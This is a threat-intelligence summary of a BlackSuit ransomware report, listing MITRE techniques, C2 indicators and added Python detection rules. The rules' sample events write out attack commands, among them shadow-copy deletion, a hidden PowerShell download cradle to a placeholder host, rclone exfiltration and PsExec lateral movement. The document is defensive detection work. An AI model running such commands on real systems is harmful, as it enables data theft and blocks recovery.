The Cybereason Security Services report analyzes a sophisticated BlackSuit ransomware attack that utilized tools like Cobalt Strike, rclone, and Windows native processes for lateral movement, data exfiltration, and file encryption. The attack uniquely combined data deletion and partial encryption to speed execution and evade detection, posing a significant threat to targeted organizations. #BlackSuit #CobaltStrike #rclone
Key points
- BlackSuit ransomware emerged in mid-2023 as a rebrand or spin-off from Royal ransomware, itself an evolution of Conti.
- The group employs Cobalt Strike, rclone, PsExec, RDP, and vssadmin for multi-stage attacks including lateral movement, data exfiltration, and encryption.
- Unlike traditional ransomware, BlackSuit exfiltrates and deletes parts of data before encrypting files to accelerate attack speed.
- Use of the “-nomutex” flag enables multiple concurrent ransomware instances, a deviation from typical mutex-based execution control.
- Attackers leveraged renamed legitimate tools like rclone (as vmware.exe) to covertly exfiltrate approximately 60 GB of data.
- Credential dumping and LSASS memory access were conducted via Cobalt Strike beacon injections and execution of Mimikatz or similar tools.
- BlackSuit avoids encrypting critical system directories and uses targeted exclusions to prevent system instability during encryption.
MITRE Techniques
- [T1059] Command and scripting interpreter – PowerShell was used to download Cobalt Strike beacons and additional malicious payloads (“PowerShell downloading Cobalt Strike beacon, and other malicious payload”).
- [T1021.002] Remote Services: SMB/Windows Admin Shares – PsExec.exe employed for lateral movement within the environment (“Lateral movement from psexec.exe”).
- [T1569.002] System Services: Service Execution – Remote service creation and lateral movement through PsExec.exe (“Lateral movement from psexec.exe”).
- [T1021] Remote Services – Utilization of RPC for lateral movement (“Lateral movement from RPC”).
- [T1021] Remote Desktop Protocol (RDP) – RDP access enabled by adding an existing user to Remote Desktop Users group (“Adds an existing user (Administrator) to the Remote Desktop Users group, enabling RDP access”).
- [T1082] System Information Discovery – Collection of installed software and security products information (“Gathering details about installed software, specifically security products”).
- [T1562.001] Disable or Modify Tools – Disabling security products to impair defenses (“Uninstall a product (probably security software)”).
- [T1105] Ingress Tool Transfer – PowerShell used to download multiple malicious payloads including Cobalt Strike beacons (“PowerShell downloading Cobalt Strike beacon, (vmware.dll)(vm.dll)(vm80.dll)(xxx.exe)(yyy.exe) and other payloads”).
- [T1003.001] LSASS Memory – LSASS credential access and dumping facilitated by Cobalt Strike beacons (“Cobalt Strike beacon lead to LSASS credential access and dumping”).
- [T1567.002] Exfiltration Over Web Service: Exfiltration to Cloud Storage – Data exfiltration via rclone utility (“Data exfiltration through rclone.exe”).
- [T1614] System Location Discovery – Avoidance of encrypting system directories and shares to evade detection and maintain system functionality (“Avoids encrypting system directories and network shares like ‘Windows’, ‘IPC$’, and ‘ADMIN$’”).
- [T1490] Inhibit System Recovery – Use of vssadmin.exe to delete shadow copies and inhibit recovery (“Deletes Volume Shadow Copies (vssadmin.exe) to prevent recovery”).
- [T1486] Data Encrypted for Impact – Encryption of files by the BlackSuit ransomware payload (“Data encryption by BlackSuit ransomware payload”).
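To turn the technique list above (and the key points about rclone running as vmware.exe and the “-nomutex” flag) into something a SOC can actually run, here is an added Python example that is not part of the Cybereason report or of this summary: a small rule set evaluated over constructed Sysmon-style process-creation records. Technique labels follow the page's own mapping; the record field names, the renamed-tool watch-list, the host names and the placeholder URL and ID in the sample events are assumptions.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Constructed Sysmon Event ID 1 style record (assumed field names)."""
    image: str                     # full path of the started process
    command_line: str
    original_file_name: str = ""   # PE version-info name, "" when unavailable
    parent_image: str = ""


# Tools the report says were renamed to blend in (rclone.exe ran as vmware.exe).
RENAMED_TOOL_WATCHLIST = {"rclone.exe", "psexec.exe"}


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# (technique id as mapped on the page, description, predicate over one event)
RULES = [
    ("T1490", "vssadmin deletes Volume Shadow Copies",
     lambda ev: _basename(ev.image) == "vssadmin.exe"
     and re.search(r"delete\s+shadows", ev.command_line, re.I) is not None),
    ("T1567.002", "watch-listed tool running under a different file name",
     lambda ev: ev.original_file_name.lower() in RENAMED_TOOL_WATCHLIST
     and ev.original_file_name.lower() != _basename(ev.image)),
    ("T1021.002", "PsExec service, or PsExec pointed at a remote host",
     lambda ev: _basename(ev.image) == "psexesvc.exe"
     or (ev.original_file_name.lower() == "psexec.exe"
         and re.search(r"\\\\[\w.-]+", ev.command_line) is not None)),
    ("T1021", "account added to the Remote Desktop Users group",
     lambda ev: _basename(ev.image) in {"net.exe", "net1.exe"}
     and re.search(r'localgroup\s+"?remote desktop users"?\s+\S+\s+/add',
                   ev.command_line, re.I) is not None),
    ("T1105", "PowerShell download cradle",
     lambda ev: _basename(ev.image) in {"powershell.exe", "pwsh.exe"}
     and re.search(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b",
                   ev.command_line, re.I) is not None),
    ("T1486", "encryptor started with -nomutex (parallel instances allowed)",
     lambda ev: "-nomutex" in ev.command_line.lower()),
]


def evaluate(ev: ProcessEvent) -> list[str]:
    """Return the technique ids of every rule the event satisfies, in rule order."""
    return [tid for tid, _desc, pred in RULES if pred(ev)]


def scan(events: list[ProcessEvent]) -> list[tuple[str, list[str]]]:
    """Keep only events that fired at least one rule."""
    out = []
    for ev in events:
        hits = evaluate(ev)
        if hits:
            out.append((ev.image, hits))
    return out


# Constructed sample events (hosts, paths and placeholders are invented).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\vssadmin.exe",
                 "vssadmin.exe delete shadows /all /quiet", "VSSADMIN.EXE",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Users\Public\vmware.exe",
                 r"vmware.exe copy C:\FileShare remote:staging --transfers 16",
                 "rclone.exe"),                       # rclone renamed, as in the report
    ProcessEvent(r"C:\Tools\psexec.exe",
                 r"psexec.exe \\WS02 -s -d cmd.exe /c whoami", "psexec.exe"),
    ProcessEvent(r"C:\Windows\System32\net.exe",
                 'net localgroup "Remote Desktop Users" Administrator /add', "net.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://placeholder.invalid/vm.dll')\"",
                 "PowerShell.EXE"),
    ProcessEvent(r"C:\Temp\rclone.exe",
                 "rclone.exe -nomutex -id PLACEHOLDER_ID", ""),   # no version info
    ProcessEvent(r"C:\Program Files\rclone\rclone.exe",
                 r"rclone.exe sync C:\Backups remote:backups", "rclone.exe"),  # benign
]

if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(hits)}")
```

The renamed-tool rule is the one worth copying: it keys on the binary's version-info name rather than the on-disk name, so rclone running as vmware.exe still fires while a normally named rclone backup job (last sample event) does not. Treat the `-nomutex` rule as a low-cost string match on a flag the report names, not as a general ransomware detector.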
Indicators of Compromise
- [SHA-256] Hashes of Cobalt Strike Beacon files – vm80.dll (d53f5c10f07d4610a0fa1b6a8638648e4ab5370377364a2cc7aff4bb75c4d71b), vm.dll (69a20bae02480e03cb36e26729ed4a74c613eee5ba8c44396655da84a851fd03)
- [SHA-256] BlackSuit payload disguised as rclone.exe – 0112e3b20872760dda5f658f6b546c85f126e803e27f0577b294f335ffa5a298
- [IP Address] Command and Control IPs – 184.174.96.71, 180.131.145.85, 82.192.88.95, 88.119.175.194
- [Domain] Malicious C2 domains – misstallion.com, store.misstallion.com, mail.misstallion.com, store.beamofthemoon.com, mail.beamofthemoon.com, beamofthemoon.com, mail.kiddlanka.com, kiddlanka.com
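As an added example that is not from the report, the following Python parses the indicator list above in exactly the format it is written in here, then matches the hashes, IPs and domains against a few constructed DNS, proxy and EDR log lines. Hash comparison is case-insensitive, and domain matching is done on label boundaries so that a lookalike such as notmisstallion.com does not match misstallion.com. The log line format, client IPs and host names are assumptions.

```python
import re

# The indicator lines of this page, copied verbatim (the parser reads this format).
IOC_TEXT = """\
- [SHA-256] Hashes of Cobalt Strike Beacon files – vm80.dll (d53f5c10f07d4610a0fa1b6a8638648e4ab5370377364a2cc7aff4bb75c4d71b), vm.dll (69a20bae02480e03cb36e26729ed4a74c613eee5ba8c44396655da84a851fd03)
- [SHA-256] BlackSuit payload disguised as rclone.exe – 0112e3b20872760dda5f658f6b546c85f126e803e27f0577b294f335ffa5a298
- [IP Address] Command and Control IPs – 184.174.96.71, 180.131.145.85, 82.192.88.95, 88.119.175.194
- [Domain] Malicious C2 domains – misstallion.com, store.misstallion.com, mail.misstallion.com, store.beamofthemoon.com, mail.beamofthemoon.com, beamofthemoon.com, mail.kiddlanka.com, kiddlanka.com
"""

HASH_RE = re.compile(r"\b[0-9a-f]{64}\b", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
KIND_RE = re.compile(r"\s*-\s*\[([^\]]+)\]")


def parse_iocs(text: str) -> dict[str, set[str]]:
    """Extract indicators from '- [Kind] description – value, value' lines."""
    iocs = {"sha256": set(), "ip": set(), "domain": set()}
    for line in text.splitlines():
        m = KIND_RE.match(line)
        if not m:
            continue
        kind = m.group(1).lower()
        if kind == "sha-256":
            iocs["sha256"].update(h.lower() for h in HASH_RE.findall(line))
        elif kind == "ip address":
            iocs["ip"].update(IPV4_RE.findall(line))
        elif kind == "domain":
            iocs["domain"].update(d.lower() for d in DOMAIN_RE.findall(line))
    return iocs


def match_line(line: str, iocs: dict[str, set[str]]) -> list[tuple[str, str]]:
    """Return (kind, observed value) for every indicator seen in one log line."""
    hits = []
    for h in HASH_RE.findall(line):
        if h.lower() in iocs["sha256"]:
            hits.append(("sha256", h.lower()))
    for ip in IPV4_RE.findall(line):
        if ip in iocs["ip"]:
            hits.append(("ip", ip))
    for d in DOMAIN_RE.findall(line):
        d = d.lower()
        # exact match or a subdomain of a listed domain; never a bare suffix match
        if any(d == known or d.endswith("." + known) for known in iocs["domain"]):
            hits.append(("domain", d))
    return hits


def scan_logs(lines: list[str], iocs: dict[str, set[str]]) -> list[tuple[int, list[tuple[str, str]]]]:
    """Line numbers (1-based) and hits for every line that matched something."""
    return [(i, hits) for i, line in enumerate(lines, 1) if (hits := match_line(line, iocs))]


# Constructed log lines (timestamps, clients and hosts are invented).
SAMPLE_LOGS = [
    "2024-05-01T10:02:11Z dns client=10.0.0.5 query=store.misstallion.com type=A",
    "2024-05-01T10:02:40Z proxy client=10.0.0.5 dst=184.174.96.71:443 bytes_out=58231",
    r"2024-05-01T10:03:02Z edr host=WS01 file=C:\Windows\Temp\vm80.dll "
    "sha256=D53F5C10F07D4610A0FA1B6A8638648E4AB5370377364A2CC7AFF4BB75C4D71B",
    "2024-05-01T10:04:15Z dns client=10.0.0.7 query=notmisstallion.com type=A",
    "2024-05-01T10:05:00Z dns client=10.0.0.7 query=www.example.com type=A",
]

if __name__ == "__main__":
    for lineno, hits in scan_logs(SAMPLE_LOGS, parse_iocs(IOC_TEXT)):
        print(lineno, hits)
```

The label-boundary check in `match_line` is the detail that matters in practice: naive substring matching on a domain list produces false positives on any name that merely ends in the same characters, while this version still catches new subdomains of the listed C2 domains.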
Read more: https://www.cybereason.com/blog/blacksuit-data-exfil